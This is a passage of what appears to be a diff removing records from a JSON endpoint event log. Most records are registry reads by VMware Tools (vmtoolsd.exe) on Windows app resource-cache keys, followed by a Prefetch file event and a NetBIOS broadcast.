Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9079405c\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9079405c\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570938080000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883570938550000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cbce6f20a\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cbce6f20a\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570938710000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883570939180000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570939180000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570939650000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d7283a095\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d7283a095\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570939650000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570940430000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d2980fb18\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d2980fb18\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570940430000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "timestamp": 131883570941050000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5d8c844891\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5d8c844891\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570941050000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883570941520000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d3750ccf4\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d3750ccf4\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570941520000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "timestamp": 131883570942150000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b594531da9e\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b594531da9e\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570942150000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570942619984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d492a8eca\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d492a8eca\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570942619984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "timestamp": 131883570943240000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d5ed8621\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d5ed8621\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570943400000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570943869984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d3d24015d40ec6\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d3d24015d40ec6\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570943869984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570944960000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed99b68f26\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed99b68f26\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570944960000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "timestamp": 131883570946369984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c9ee9ce45\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c9ee9ce45\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570946369984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "timestamp": 131883570946680000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8a574905\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8a574905\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570946680000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "timestamp": 131883570946990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d11cfb971\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d11cfb971\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570946990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri", - "registry_value": "C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri", - "timestamp": 131883570947150000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri\\1d3d1edc24bc16f\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri\\1d3d1edc24bc16f\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570947150000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "file", - "file_name": "SVCHOST.EXE-7F44DDFD.pf", - "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-7F44DDFD.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570978250000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "destination_address": "192.168.162.255", - "destination_port": "137", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.134", - "source_port": "137", - "subtype": "outgoing", - "timestamp": 131883570966190000, - "unique_pid": 